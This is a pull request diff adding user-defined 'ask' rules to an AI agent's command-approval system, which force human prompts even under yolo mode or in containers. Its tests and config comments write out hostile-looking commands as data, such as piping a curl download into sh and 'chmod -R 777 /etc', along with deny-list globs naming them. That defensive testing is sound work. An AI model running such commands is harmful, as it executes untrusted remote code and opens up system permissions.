### PR TITLE
feat(approvals): user-defined ask rules — Claude Code-style ask/allow/deny trio

### DIFF
--- a/hermes_cli/approvals_test.py
+++ b/hermes_cli/approvals_test.py
@@ -112,6 +112,17 @@ def evaluate_command(command: str, env_type: str = "local") -> dict:
                    "config.yaml (blocked even under --yolo / mode=off)",
         )
 
+    # 4.5 User-defined approvals.ask rules — also fire before yolo/off,
+    # but unlike deny they PROMPT instead of blocking.
+    ask_pattern = approval._match_user_ask_rule(command)
+    if ask_pattern is not None:
+        return result(
+            "ask-approval", rule=f"approvals.ask: {ask_pattern}",
+            detail="matches a user-defined approvals.ask rule in config.yaml; "
+                   "the runtime raises an approval prompt even under "
+                   "--yolo / approvals.mode=off",
+        )
+
     # 5. Yolo / approvals.mode=off bypass.
     if (approval._YOLO_MODE_FROZEN
             or approval.is_current_session_yolo_enabled()

--- a/hermes_cli/approvals_test.py
+++ b/hermes_cli/approvals_test.py
@@ -77,13 +77,30 @@ def evaluate_command(command: str, env_type: str = "local") -> dict:
             "normalized_variants": variants,
         }
 
-    # 1. Isolated container backends skip every guard (runtime parity:
-    #    this fires BEFORE the hardline floor in check_all_command_guards).
+    # 1. Isolated container backends skip ORDINARY guards, but the runtime
+    #    evaluates the operator's explicit deny/ask policy BEFORE the
+    #    optimization (parity with check_all_command_guards / #91029).
     if approval._should_skip_container_guards(env_type):
+        _deny = approval._match_user_deny_rule(command)
+        if _deny is not None:
+            return result(
+                "user-deny", rule=_deny,
+                detail="matches a user-defined approvals.deny rule in "
+                       "config.yaml (blocked even in an isolated container, "
+                       "under --yolo, or with mode=off)",
+            )
+        _ask = approval._match_user_ask_rule(command)
+        if _ask is not None:
+            return result(
+                "ask-approval", rule=f"approvals.ask: {_ask}",
+                detail="matches a user-defined approvals.ask rule in "
+                       "config.yaml (prompted even in an isolated container)",
+            )
         return result(
             "allow",
             detail=(f"env_type '{env_type}' is an isolated container backend; "
-                    "the runtime skips all command guards for it"),
+                    "the runtime skips ordinary command guards after "
+                    "approvals.deny / approvals.ask evaluation"),
         )
 
     # 2. Hardline blocklist — never bypassable, even under yolo.

--- a/hermes_cli/config_defaults.py
+++ b/hermes_cli/config_defaults.py
@@ -2375,8 +2375,11 @@ DEFAULT_CONFIG = {
         # mode=off bypass — so a command can be surfaced to the user even
         # while approvals are otherwise bypassed. Claude Code-style
         # ask/allow/deny trio: deny blocks, command_allowlist auto-approves,
-        # ask prompts. Answering [a]lways persists per-rule. In cron /
-        # single-query (no human present) an ask match fails closed.
+        # ask prompts. Answering [a]lways persists per-rule: it stores the
+        # whole glob, so approving `ssh hostA` once with always allows every
+        # future command matching that same pattern ("ssh *" → all ssh).
+        # In cron / single-query (no human present) an ask match fails
+        # closed.
         # Example:
         #   ask:
         #     - "ssh *"

--- a/hermes_cli/config_defaults.py
+++ b/hermes_cli/config_defaults.py
@@ -2369,6 +2369,19 @@ DEFAULT_CONFIG = {
         #     - "git push --force*"
         #     - "*curl*|*sh*"
         "deny": [],
+        # User-defined ask rules: fnmatch globs matched against terminal
+        # commands (same matching semantics as deny). A match raises the
+        # interactive approval prompt — BEFORE the --yolo / /yolo /
+        # mode=off bypass — so a command can be surfaced to the user even
+        # while approvals are otherwise bypassed. Claude Code-style
+        # ask/allow/deny trio: deny blocks, command_allowlist auto-approves,
+        # ask prompts. Answering [a]lways persists per-rule. In cron /
+        # single-query (no human present) an ask match fails closed.
+        # Example:
+        #   ask:
+        #     - "ssh *"
+        #     - "scp *"
+        "ask": [],
         # When true, /reload-mcp asks the user to confirm before rebuilding
         # the MCP tool set for the active session.  Reloading invalidates
         # the provider prompt cache (tool schemas are baked into the system

--- a/tests/hermes_cli/test_approvals_test.py
+++ b/tests/hermes_cli/test_approvals_test.py
@@ -79,6 +79,17 @@ class TestVerdicts:
         assert "user-deny" in out
         assert "git push *" in out
 
+    def test_user_ask_rule_reports_ask_even_under_off(self, isolated_approvals,
+                                                      capsys, monkeypatch):
+        monkeypatch.setattr(
+            A, "_get_approval_config",
+            lambda: {"mode": "off", "ask": ["ssh *"]})
+        rc = at.approvals_test_command(_args(["ssh", "host", "'echo hi'"]))
+        out = capsys.readouterr().out
+        assert rc == 2
+        assert "ask-approval" in out
+        assert "approvals.ask" in out
+
     def test_container_env_type_skips_guards_like_runtime(self, isolated_approvals,
                                                           capsys):
         # Mirrors check_all_command_guards: isolated docker skips BEFORE the

--- a/tests/tools/test_approval_ask_rules.py
+++ b/tests/tools/test_approval_ask_rules.py
@@ -1,0 +1,114 @@
+"""Tests for user-defined ask rules (approvals.ask in config.yaml).
+
+approvals.ask is the middle tier of the user-editable rule lists: deny
+blocks unconditionally, command_allowlist auto-approves, and ask forces the
+human-approval prompt BEFORE the --yolo / /yolo / mode=off bypass — the
+user saying "always show me this, even when approvals are bypassed".
+"""
+
+import pytest
+
+from tools import approval as mod
+
+
+@pytest.fixture
+def ask_config(monkeypatch):
+    """Install an approvals.ask list into the config and return a setter."""
+
+    state = {"config": {"mode": "manual", "ask": []}}
+
+    def set_ask(patterns, **extra):
+        state["config"] = {
+            "mode": extra.pop("mode", "manual"),
+            "deny": extra.pop("deny", []),
+            "ask": list(patterns),
+            **{k: v for k, v in extra.items() if k != "mode"},
+        }
+
+    monkeypatch.setattr(mod, "_get_approval_config", lambda: state["config"])
+    return set_ask
+
+
+@pytest.fixture
+def clean_env(monkeypatch):
+    """Non-interactive, non-gateway, non-cron, non-yolo baseline."""
+    for var in ("HERMES_YOLO_MODE", "HERMES_GATEWAY_SESSION",
+                "HERMES_CRON_SESSION", "HERMES_INTERACTIVE",
+                "HERMES_EXEC_ASK"):
+        monkeypatch.delenv(var, raising=False)
+    monkeypatch.setattr(mod, "_YOLO_MODE_FROZEN", False)
+
+
+class TestMatchUserAskRule:
+    def test_empty_list_is_noop(self, ask_config):
+        ask_config([])
+        assert mod._match_user_ask_rule("ssh host") is None
+
+    def test_missing_key_is_noop(self, monkeypatch):
+        monkeypatch.setattr(mod, "_get_approval_config",
+                            lambda: {"mode": "manual"})
+        assert mod._match_user_ask_rule("ssh host") is None
+
+    def test_config_load_failure_fails_open(self, monkeypatch):
+        def boom():
+            raise RuntimeError("config unavailable")
+        monkeypatch.setattr(mod, "_get_approval_config", boom)
+        assert mod._match_user_ask_rule("ssh host") is None
+
+    def test_glob_match(self, ask_config):
+        ask_config(["ssh *"])
+        assert mod._match_user_ask_rule(
+            "ssh -i key ubuntu@host 'echo hi'") == "ssh *"
+        assert mod._match_user_ask_rule("ls -la /tmp") is None
+
+    def test_quote_obfuscation_still_matches(self, ask_config):
+        ask_config(["ssh *"])
+        assert mod._match_user_ask_rule('ss""h host') is not None
+
+
+class TestAskPromptsUnderBypass:
+    def test_ask_beats_yolo_frozen(self, ask_config, clean_env, monkeypatch):
+        ask_config(["ssh *"], mode="off")
+        monkeypatch.setattr(mod, "_YOLO_MODE_FROZEN", True)
+
+        result = mod.check_dangerous_command("ssh ubuntu@host 'echo hi'",
+                                             "local")
+        # The gate ran and, with no human present, failed closed — the
+        # command was NOT silently approved by the yolo bypass.
+        assert result["approved"] is False
+        assert "approvals.ask" in (result.get("message") or "")
+
+    def test_ask_beats_mode_off(self, ask_config, clean_env):
+        ask_config(["scp *"], mode="off")
+
+        result = mod.check_dangerous_command("scp f.txt ubuntu@host:/tmp/",
+                                             "local")
+        assert result["approved"] is False
+        assert "approvals.ask" in result["message"]
+
+    def test_non_matching_command_allowed_under_off(
+            self, ask_config, clean_env):
+        ask_config(["ssh *"], mode="off")
+        result = mod.check_dangerous_command("echo hello", "local")
+        assert result == {"approved": True, "message": None}
+
+
+class TestDenyBeatsAsk:
+    def test_deny_wins_when_both_match(self, monkeypatch, clean_env):
+        state = {"config": {"mode": "off", "deny": ["ssh *"],
+                            "ask": ["ssh *"]}}
+        monkeypatch.setattr(mod, "_get_approval_config",
+                            lambda: state["config"])
+
+        result = mod.check_dangerous_command("ssh host", "local")
+        assert result["approved"] is False
+        assert result.get("user_deny") is True
+
+
+class TestNoHumanFailsClosed:
+    def test_bare_script_blocked_not_autoapproved(
+            self, ask_config, clean_env):
+        ask_config(["ssh *"])
+        result = mod.check_dangerous_command("ssh host", "local")
+        assert result["approved"] is False
+        assert "no interactive user or gateway" in result["message"]

--- a/tests/tools/test_approval_authority_blockers.py
+++ b/tests/tools/test_approval_authority_blockers.py
@@ -1,0 +1,177 @@
+"""Regression tests for review blockers on PR #92437.
+
+Blocker 1 — an approvals.ask grant is ADDITIVE authority: it may suppress
+the ask prompt only, never an independently-detected dangerous/Tirith
+finding on the same command.
+
+Blocker 2 — explicit deny/ask policy precedes the isolated-container
+fast path (composes with #91029's deny topology).
+
+Blocker 3 — an ask rule demands a HUMAN: cron_mode/single_query_mode
+'approve' must not silently authorize it (fail closed instead).
+"""
+
+import pytest
+
+from tools import approval as mod
+
+
+@pytest.fixture
+def ask_config(monkeypatch):
+    state = {"config": {"mode": "manual", "ask": []}}
+
+    def set_ask(patterns, **extra):
+        state["config"] = {
+            "mode": extra.pop("mode", "manual"),
+            "deny": extra.pop("deny", []),
+            "ask": list(patterns),
+            "cron_mode": extra.pop("cron_mode", None),
+            "single_query_mode": extra.pop("single_query_mode", None),
+        }
+        state["config"] = {k: v for k, v in state["config"].items()
+                           if v is not None}
+
+    monkeypatch.setattr(mod, "_get_approval_config", lambda: state["config"])
+    return set_ask
+
+
+@pytest.fixture
+def clean_env(monkeypatch):
+    for var in ("HERMES_YOLO_MODE", "HERMES_GATEWAY_SESSION",
+                "HERMES_CRON_SESSION", "HERMES_SINGLE_QUERY_SESSION",
+                "HERMES_INTERACTIVE", "HERMES_EXEC_ASK"):
+        monkeypatch.delenv(var, raising=False)
+    monkeypatch.setattr(mod, "_YOLO_MODE_FROZEN", False)
+
+
+@pytest.fixture(autouse=True)
+def fresh_approvals(monkeypatch):
+    """No cached grants leak between tests."""
+    saved_p, saved_s = set(mod._permanent_approved), dict(mod._session_approved)
+    mod._permanent_approved.clear()
+    mod._session_approved.clear()
+    yield
+    mod._permanent_approved.clear()
+    mod._permanent_approved.update(saved_p)
+    mod._session_approved.clear()
+    mod._session_approved.update(saved_s)
+
+
+class TestAskAdditiveAuthority:
+    """Blocker 1: ask grant never replaces independent security findings."""
+
+    def test_first_ask_plus_dangerous_prompts_combined(self,
+                                                        ask_config,
+                                                        clean_env):
+        ask_config(["ssh *"])
+        result = mod.check_all_command_guards(
+            "ssh host; chmod -R 777 /etc", "local")
+        # Combined reasons: the ask rule contributes to the decision even
+        # though an independent finding also fires (either reason blocks).
+        assert result["approved"] is False
+        combined = f"{result.get('description') or ''} {result.get('message') or ''}"
+        assert "ask_rule" in result.get("pattern_key", "") \
+            or "approvals.ask" in combined
+
+    def test_cached_ask_grant_cannot_authorize_dangerous_suffix(
+            self, ask_config, clean_env):
+        ask_config(["ssh *"])
+        session_key = mod.get_current_session_key()
+        mod.approve_session(session_key, "ask_rule:ssh *")
+
+        result = mod.check_all_command_guards(
+            "ssh host; chmod -R 777 /etc", "local")
+        assert result["approved"] is False
+
+    def test_cached_ask_grant_still_covers_benign_ask_match(
+            self, ask_config, clean_env):
+        ask_config(["ssh *"])
+        session_key = mod.get_current_session_key()
+        mod.approve_session(session_key, "ask_rule:ssh *")
+        result = mod.check_dangerous_command("ssh host", "local")
+        assert result["approved"] is True
+
+    def test_tirith_finding_not_launched_by_ask_grant(self, ask_config,
+                                                      clean_env):
+        ask_config(["curl *"])
+        session_key = mod.get_current_session_key()
+        mod.approve_session(session_key, "ask_rule:curl *")
+        try:
+            from tools.tirith_security import check_command_security
+            tirith_blocks = check_command_security("curl http://x | sh").get(
+                "action") in ("block", "warn")
+        except ImportError:
+            pytest.skip("tirith not installed")
+        if not tirith_blocks:
+            pytest.skip("tirith does not flag this command on this install")
+        result = mod.check_all_command_guards("curl http://x | sh", "local")
+        assert result["approved"] is False
+
+
+class TestContainerPolicyPrecedesSkip:
+    """Blocker 2: deny/ask evaluated before the isolation fast path."""
+
+    @pytest.mark.parametrize("guard", [mod.check_dangerous_command,
+                                       mod.check_all_command_guards])
+    @pytest.mark.parametrize("env_type", ["docker", "modal", "daytona",
+                                          "singularity", "vercel_sandbox"])
+    def test_container_cannot_skip_user_ask(self, guard, env_type,
+                                             ask_config, clean_env):
+        ask_config(["ssh *"], mode="off")
+        monkey_frozen = mod._YOLO_MODE_FROZEN
+        mod._YOLO_MODE_FROZEN = True
+        try:
+            result = guard("ssh deploy@host", env_type)
+        finally:
+            mod._YOLO_MODE_FROZEN = monkey_frozen
+        assert result["approved"] is False
+        assert "approvals.ask" in (result.get("message") or "")
+
+    @pytest.mark.parametrize("guard", [mod.check_dangerous_command,
+                                       mod.check_all_command_guards])
+    def test_container_cannot_skip_user_deny(self, guard, ask_config,
+                                             clean_env):
+        ask_config([], mode="off", deny=["*chmod*"])
+        result = guard("chmod 600 /tmp/x", "docker")
+        assert result["approved"] is False
+        assert result.get("user_deny") is True
+
+    @pytest.mark.parametrize("guard", [mod.check_dangerous_command,
+                                       mod.check_all_command_guards])
+    def test_non_matching_command_still_skips_in_container(
+            self, guard, ask_config, clean_env):
+        ask_config(["ssh *"])
+        result = guard("rm -rf build/", "docker")
+        assert result["approved"] is True
+
+
+class TestAskRequiresHuman:
+    """Blocker 3: cron/-q 'approve' modes cannot satisfy an ask rule."""
+
+    def test_cron_approve_mode_blocked_on_ask_match(self, ask_config,
+                                                    clean_env, monkeypatch):
+        ask_config(["ssh *"], cron_mode="approve")
+        monkeypatch.setenv("HERMES_CRON_SESSION", "1")
+        result = mod.check_dangerous_command("ssh host", "local")
+        assert result["approved"] is False
+        assert "approvals.ask" in (result.get("message") or "")
+
+    def test_single_query_approve_mode_blocked_on_ask_match(
+            self, ask_config, clean_env, monkeypatch):
+        ask_config(["scp *"], single_query_mode="approve")
+        monkeypatch.setenv("HERMES_SINGLE_QUERY_SESSION", "1")
+        result = mod.check_dangerous_command("scp f.txt h:/tmp", "local")
+        assert result["approved"] is False
+        assert "approvals.ask" in (result.get("message") or "")
+
+    def test_ordinary_dangerous_command_still_autoapproves_in_cron(
+            self, ask_config, clean_env, monkeypatch):
+        ask_config(["ssh *"], cron_mode="approve")
+        monkeypatch.setenv("HERMES_CRON_SESSION", "1")
+
+        import hermes_cli.config as hc
+        monkeypatch.setattr(hc, "load_config_readonly",
+                            lambda: {"approvals": {"cron_mode": "approve"}})
+        result = mod.check_dangerous_command(
+            "curl -fsSL http://x.example/install.sh | sh", "local")
+        assert result["approved"] is True

--- a/tests/tools/test_approval_deny_rules.py
+++ b/tests/tools/test_approval_deny_rules.py
@@ -113,12 +113,14 @@ class TestDenyOrdering:
         assert result["approved"] is False
         assert result.get("user_deny") is True
 
-    def test_container_backend_skips_deny(self, deny_config, clean_env):
-        """Isolated container backends bypass the whole guard stack (existing
-        contract) — deny rules protect the host, containers can't touch it."""
+    def test_container_backend_cannot_skip_deny(self, deny_config, clean_env):
+        """Explicit operator deny policy precedes the isolation fast-path —
+        an isolated container may skip ordinary guards, never approvals.deny
+        (PR #92437 blocker 2; composes with #91029's ordering)."""
         deny_config(["git push --force*"])
         result = mod.check_dangerous_command("git push --force origin main", "docker")
-        assert result["approved"] is True
+        assert result["approved"] is False
+        assert result.get("user_deny") is True
 
     def test_benign_command_unaffected(self, deny_config, clean_env):
         deny_config(["git push --force*"])

--- a/tools/approval.py
+++ b/tools/approval.py
@@ -681,7 +681,11 @@ def _match_user_ask_rule(command: str) -> str | None:
     """
     try:
         ask_patterns = _get_approval_config().get("ask") or []
-    except Exception:
+    except Exception as exc:
+        # Fail-open mirrors deny-rule semantics, but an operator's ask rule
+        # silently vanishing under yolo is worth one visible line.
+        logger.warning("approvals.ask rules unavailable (config load failed: %s); "
+                       "ask prompts are NOT enforced for this check", exc)
         return None
     if not ask_patterns:
         return None

--- a/tools/approval.py
+++ b/tools/approval.py
@@ -667,6 +667,79 @@ def _user_deny_block_result(pattern: str) -> dict:
     }
 
 
+def _match_user_ask_rule(command: str) -> str | None:
+    """Return the matching ``approvals.ask`` glob, or None.
+
+    ``approvals.ask`` in config.yaml is the middle tier of the user-editable
+    rule lists: ``deny`` blocks unconditionally, ``command_allowlist``
+    auto-approves, and ``ask`` forces the human-approval prompt — BEFORE the
+    yolo / mode=off bypass, because the whole point of an ask rule is "show
+    me this one even when approvals are otherwise off". Matching mirrors
+    :func:`_match_user_deny_rule` (same normalized / deobfuscated command
+    variants, case-insensitive fnmatch) so quoting tricks can't sidestep a
+    rule. Empty/absent list = no-op.
+    """
+    try:
+        ask_patterns = _get_approval_config().get("ask") or []
+    except Exception:
+        return None
+    if not ask_patterns:
+        return None
+    globs = [p.strip() for p in ask_patterns
+             if isinstance(p, str) and p.strip()]
+    if not globs:
+        return None
+    for command_variant in _command_detection_variants(command):
+        candidate = command_variant.lower().strip()
+        for pattern in globs:
+            if fnmatch.fnmatchcase(candidate, pattern.lower()):
+                return pattern
+    return None
+
+
+def _user_ask_gate(pattern: str, command: str,
+                   approval_callback=None) -> dict:
+    """Route an ``approvals.ask`` match through the shared approval gate.
+
+    Uses a synthetic ``ask_rule:<glob>`` pattern key so an answer of
+    ``[a]lways`` persists per-rule in the same allowlist machinery as
+    dangerous-command approvals — each glob is independently
+    approvable-once/session/always. No-human contexts fail CLOSED: an ask
+    rule is an explicit demand for a human decision, so with no human
+    reachable the command must not run (unlike the historical fail-open
+    dangerous-pattern path).
+    """
+    return _run_approval_gate(
+        pattern_key=f"ask_rule:{pattern}",
+        description=(f"user-defined ask rule '{pattern}' (approvals.ask in "
+                     "config.yaml) requires your approval"),
+        display_target=command,
+        approval_callback=approval_callback,
+        cron_deny_message=(
+            f"BLOCKED: Command matches the user-defined ask rule '{pattern}' "
+            "(approvals.ask in config.yaml) but cron jobs run without a user "
+            "present to approve it. Find an alternative approach, or remove "
+            "this ask rule if the command is safe unattended."
+        ),
+        single_query_deny_message=(
+            f"BLOCKED: Command matches the user-defined ask rule '{pattern}' "
+            "(approvals.ask in config.yaml) but single-query mode (-q) runs "
+            "without a user present to approve it. Find an alternative "
+            "approach, or remove this ask rule if the command is safe "
+            "without a human."
+        ),
+        autoapprove_log_prefix="approvals.ask rule",
+        honor_yolo_bypass=False,
+        fail_closed_when_no_human=True,
+        no_human_block_message=(
+            f"BLOCKED: Command matches the user-defined ask rule '{pattern}' "
+            "(approvals.ask in config.yaml) but no interactive user or "
+            "gateway is present to approve it. An ask rule explicitly "
+            "demands a human decision."
+        ),
+    )
+
+
 def _save_blocked_payload(command: str) -> Optional[str]:
     """Persist a parser-limit-blocked command as a runnable script.
 
@@ -3423,6 +3496,7 @@ def _run_approval_gate(
     autoapprove_log_prefix: str,
     fail_closed_when_no_human: bool = False,
     no_human_block_message: str = "",
+    honor_yolo_bypass: bool = True,
 ) -> dict:
     """Shared human-approval gate for a flagged action (command or tool).
 
@@ -3468,8 +3542,11 @@ def _run_approval_gate(
     """
     # --yolo bypasses all approval prompts (session- or process-scoped).
     # Hardline blocks are handled by the caller BEFORE this gate, so yolo
-    # here only skips the recoverable approval layer.
-    if _YOLO_MODE_FROZEN or is_current_session_yolo_enabled():
+    # here only skips the recoverable approval layer. approvals.ask rules
+    # pass honor_yolo_bypass=False — their whole point is to surface a
+    # prompt even while approvals are otherwise bypassed.
+    if honor_yolo_bypass and (
+            _YOLO_MODE_FROZEN or is_current_session_yolo_enabled()):
         return {"approved": True, "message": None}
 
     session_key = get_current_session_key()
@@ -3753,6 +3830,17 @@ def check_dangerous_command(command: str, env_type: str,
         logger.warning("User deny rule %r blocked command: %s",
                        deny_pattern, command[:200])
         return _user_deny_block_result(deny_pattern)
+
+    # User-defined ask rules (approvals.ask in config.yaml): also fire BEFORE
+    # the yolo bypass — an ask rule is the user saying "always show me this,
+    # even when approvals are otherwise bypassed". Unlike deny, a match does
+    # not block; it routes through the shared human-approval gate.
+    ask_pattern = _match_user_ask_rule(command)
+    if ask_pattern is not None:
+        logger.info("User ask rule %r requires approval: %s",
+                    ask_pattern, command[:200])
+        return _user_ask_gate(ask_pattern, command,
+                              approval_callback=approval_callback)
 
     # --yolo: bypass all approval prompts. Gateway /yolo is session-scoped;
     # CLI --yolo remains process-scoped via the env var for local use.
@@ -4386,6 +4474,15 @@ def check_all_command_guards(command: str, env_type: str,
         logger.warning("User deny rule %r blocked command: %s",
                        deny_pattern, command[:200])
         return _user_deny_block_result(deny_pattern)
+
+    # User-defined ask rules (approvals.ask): same pre-yolo placement as in
+    # check_dangerous_command — prompt even under yolo / mode=off.
+    ask_pattern = _match_user_ask_rule(command)
+    if ask_pattern is not None:
+        logger.info("User ask rule %r requires approval: %s",
+                    ask_pattern, command[:200])
+        return _user_ask_gate(ask_pattern, command,
+                              approval_callback=approval_callback)
 
     # --yolo or approvals.mode=off: bypass all approval prompts.
     # Gateway /yolo is session-scoped; CLI --yolo remains process-scoped.

--- a/tools/approval.py
+++ b/tools/approval.py
@@ -735,6 +735,7 @@ def _user_ask_gate(pattern: str, command: str,
         autoapprove_log_prefix="approvals.ask rule",
         honor_yolo_bypass=False,
         fail_closed_when_no_human=True,
+        require_human=True,
         no_human_block_message=(
             f"BLOCKED: Command matches the user-defined ask rule '{pattern}' "
             "(approvals.ask in config.yaml) but no interactive user or "
@@ -3501,6 +3502,7 @@ def _run_approval_gate(
     fail_closed_when_no_human: bool = False,
     no_human_block_message: str = "",
     honor_yolo_bypass: bool = True,
+    require_human: bool = False,
 ) -> dict:
     """Shared human-approval gate for a flagged action (command or tool).
 
@@ -3552,6 +3554,10 @@ def _run_approval_gate(
     if honor_yolo_bypass and (
             _YOLO_MODE_FROZEN or is_current_session_yolo_enabled()):
         return {"approved": True, "message": None}
+    if require_human and is_approved(get_current_session_key(), pattern_key):
+        # Cached human grant for THIS ask rule — additive-authority keys are
+        # checked by callers before reaching here for other findings.
+        return {"approved": True, "message": None}
 
     session_key = get_current_session_key()
     if is_approved(session_key, pattern_key):
@@ -3570,7 +3576,57 @@ def _run_approval_gate(
         is_cli = False
         is_gateway = False
 
-    if not is_cli and not is_gateway:
+    # Ask rules are an explicit demand for a HUMAN decision: generic
+    # unattended policy (cron_mode / single_query_mode = approve) exists to
+    # waive the heuristic dangerous-command prompt, not a rule whose whole
+    # purpose is to force a human. When require_human=True those modes can
+    # only deny-or-block, never silently approve (review blocker 3).
+    if require_human and (is_cli or is_gateway):
+        pass  # a real answer surface exists; fall through to prompting below
+    elif require_human:
+        if _is_single_query_approval_context():
+            if _get_single_query_approval_mode() == "deny":
+                return {
+                    "approved": False,
+                    "message": single_query_deny_message,
+                    "pattern_key": pattern_key,
+                    "description": description,
+                }
+            logger.warning(
+                "%s (pattern: %s): %s — single-query mode cannot authorize an "
+                "ask rule; BLOCKED (an ask rule demands a human).",
+                autoapprove_log_prefix, pattern_key, description,
+            )
+            return {
+                "approved": False,
+                "message": single_query_deny_message,
+                "pattern_key": pattern_key,
+                "description": description,
+            }
+        if _is_cron_approval_context():
+            return {
+                "approved": False,
+                "message": cron_deny_message,
+                "pattern_key": pattern_key,
+                "description": description,
+            }
+        if fail_closed_when_no_human:
+            logger.warning(
+                "%s (pattern: %s): %s — no interactive user/gateway present; "
+                "BLOCKED (fail-closed). Set HERMES_INTERACTIVE or "
+                "HERMES_GATEWAY_SESSION to answer the prompt.",
+                autoapprove_log_prefix, pattern_key, description,
+            )
+            return {
+                "approved": False,
+                "message": no_human_block_message or (
+                    f"BLOCKED: approval required ({description}) but no "
+                    "interactive user or gateway is present to approve it."
+                ),
+                "pattern_key": pattern_key,
+                "description": description,
+            }
+    elif not is_cli and not is_gateway:
         # Single-query (-q) sessions: respect single_query_mode config
         if _is_single_query_approval_context():
             if _get_single_query_approval_mode() == "deny":
@@ -3795,6 +3851,13 @@ def _should_skip_container_guards(env_type: str, has_host_access: bool = False) 
     return env_type in ("singularity", "modal", "daytona", "vercel_sandbox")
 
 
+
+def _is_also_dangerous_helper(command: str) -> bool:
+    """Detection-only probe reused by the container pre-policy blocks."""
+    is_dangerous, _, _ = detect_dangerous_command(command)
+    return is_dangerous
+
+
 def check_dangerous_command(command: str, env_type: str,
                             approval_callback=None,
                             has_host_access: bool = False) -> dict:
@@ -3814,6 +3877,29 @@ def check_dangerous_command(command: str, env_type: str,
         {"approved": True/False, "message": str or None, ...}
     """
     if _should_skip_container_guards(env_type, has_host_access=has_host_access):
+        # Isolation skips ORDINARY guards, but an operator's explicit
+        # approvals.deny / approvals.ask policy precedes the optimization:
+        # a sandbox is not consent to ignore stated policy (composes with
+        # the deny-side topology from #91029).
+        deny_pattern = _match_user_deny_rule(command)
+        if deny_pattern is not None:
+            logger.warning("User deny rule %r blocked command: %s",
+                           deny_pattern, command[:200])
+            return _user_deny_block_result(deny_pattern)
+        ask_pattern = _match_user_ask_rule(command)
+        if ask_pattern is not None:
+            logger.info("User ask rule %r requires approval: %s",
+                        ask_pattern, command[:200])
+            _is_also_dangerous, _, _desc = detect_dangerous_command(command)
+            if _is_also_dangerous:
+                # Strip the isolation fast-path so the combined gate below
+                # gathers the full finding set for this host-reaching rule.
+                return check_all_command_guards(
+                    command, "local",
+                    approval_callback=approval_callback,
+                    has_host_access=False)
+            return _user_ask_gate(ask_pattern, command,
+                                  approval_callback=approval_callback)
         return {"approved": True, "message": None}
 
     # Hardline floor: commands with no recovery path (rm -rf /, mkfs, dd
@@ -3839,10 +3925,23 @@ def check_dangerous_command(command: str, env_type: str,
     # the yolo bypass — an ask rule is the user saying "always show me this,
     # even when approvals are otherwise bypassed". Unlike deny, a match does
     # not block; it routes through the shared human-approval gate.
+    #
+    # An ask grant is ADDITIVE authority: it may only suppress the ASK
+    # prompt itself, never an independently-detected dangerous/Tirith
+    # finding on the same command. When both fire, defer to the combined
+    # gather-then-decide gate in check_all_command_guards so the single
+    # prompt carries every reason (a cached `ask_rule:<glob>` approval
+    # cannot launder `ssh host ; <dangerous suffix>` past its own detector).
     ask_pattern = _match_user_ask_rule(command)
     if ask_pattern is not None:
         logger.info("User ask rule %r requires approval: %s",
                     ask_pattern, command[:200])
+        _is_also_dangerous, _, _desc = detect_dangerous_command(command)
+        if _is_also_dangerous:
+            return check_all_command_guards(
+                command, env_type,
+                approval_callback=approval_callback,
+                has_host_access=has_host_access)
         return _user_ask_gate(ask_pattern, command,
                               approval_callback=approval_callback)
 
@@ -4445,9 +4544,33 @@ def check_all_command_guards(command: str, env_type: str,
     such a session is no longer isolated, so it goes through the normal flow
     instead of the container fast-path.
     """
-    # Skip isolated container backends for both checks. Docker stops skipping
-    # once host paths are bind-mounted into the sandbox.
+    # Skip ordinary guards for isolated containers — but never an operator's
+    # explicit approvals.deny / approvals.ask policy (composes with #91029;
+    # Docker stops skipping once host paths are bind-mounted into the sandbox).
     if _should_skip_container_guards(env_type, has_host_access=has_host_access):
+        deny_pattern = _match_user_deny_rule(command)
+        if deny_pattern is not None:
+            logger.warning("User deny rule %r blocked command: %s",
+                           deny_pattern, command[:200])
+            return _user_deny_block_result(deny_pattern)
+        ask_pattern = _match_user_ask_rule(command)
+        if ask_pattern is not None:
+            logger.info("User ask rule %r requires approval: %s",
+                        ask_pattern, command[:200])
+            try:
+                from tools.tirith_security import check_command_security as _ccs
+                _also_tirith = _ccs(command).get("action") in ("block", "warn")
+            except ImportError:
+                _also_tirith = False
+            if not (_is_also_dangerous_helper(command) or _also_tirith):
+                return _user_ask_gate(ask_pattern, command,
+                                      approval_callback=approval_callback)
+            # Combined path: re-enter without the fast-path so the findings
+            # phase assembles every reason into one prompt.
+            return check_all_command_guards(
+                command, "local",
+                approval_callback=approval_callback,
+                has_host_access=False)
         return {"approved": True, "message": None}
 
     # Hardline floor: unconditional block for catastrophic commands
@@ -4481,12 +4604,29 @@ def check_all_command_guards(command: str, env_type: str,
 
     # User-defined ask rules (approvals.ask): same pre-yolo placement as in
     # check_dangerous_command — prompt even under yolo / mode=off.
+    #
+    # Additive-authority invariant: a cached ask grant may silence the ask
+    # key alone, never an independent security finding. So when the command
+    # also trips dangerous-pattern or Tirith detection, do NOT short-circuit
+    # here and do NOT re-enter via the gate (its cached-grant shortcut would
+    # approve before the detectors' findings are seen) — fall through to the
+    # findings phase, which gathers BOTH reasons into one prompt and lets
+    # the cached ask key cover just the ask part.
     ask_pattern = _match_user_ask_rule(command)
+    _ask_has_independent_finding = False
     if ask_pattern is not None:
         logger.info("User ask rule %r requires approval: %s",
                     ask_pattern, command[:200])
-        return _user_ask_gate(ask_pattern, command,
-                              approval_callback=approval_callback)
+        _is_also_dangerous, _, _ = detect_dangerous_command(command)
+        try:
+            from tools.tirith_security import check_command_security as _ccs
+            _also_tirith = _ccs(command).get("action") in ("block", "warn")
+        except ImportError:
+            _also_tirith = False
+        if not (_is_also_dangerous or _also_tirith):
+            return _user_ask_gate(ask_pattern, command,
+                                  approval_callback=approval_callback)
+        _ask_has_independent_finding = True
 
     # --yolo or approvals.mode=off: bypass all approval prompts.
     # Gateway /yolo is session-scoped; CLI --yolo remains process-scoped.
@@ -4515,7 +4655,15 @@ def check_all_command_guards(command: str, env_type: str,
 
     # Preserve the existing non-interactive behavior: outside CLI/gateway/ask
     # flows, we do not block on approvals and we skip external guard work.
-    if not is_cli and not is_gateway and not is_ask:
+    if (not is_cli and not is_gateway and not is_ask
+            and not _ask_has_independent_finding):
+        # An explicit PURE ask match overrides this historical auto-approve:
+        # its whole purpose is to force a human decision, so a bare-script /
+        # unattended context fails closed through the ask gate instead of
+        # silently approving here (blockers 1+3). A COMBINED match (ask +
+        # independent finding) skips this block entirely so the findings
+        # phase below assembles every reason; with no answer surface it
+        # surfaces pending_approval rather than an approval bypass.
         # Single-query (-q) sessions: respect single_query_mode config
         if _is_single_query_approval_context():
             if _get_single_query_approval_mode() == "deny":
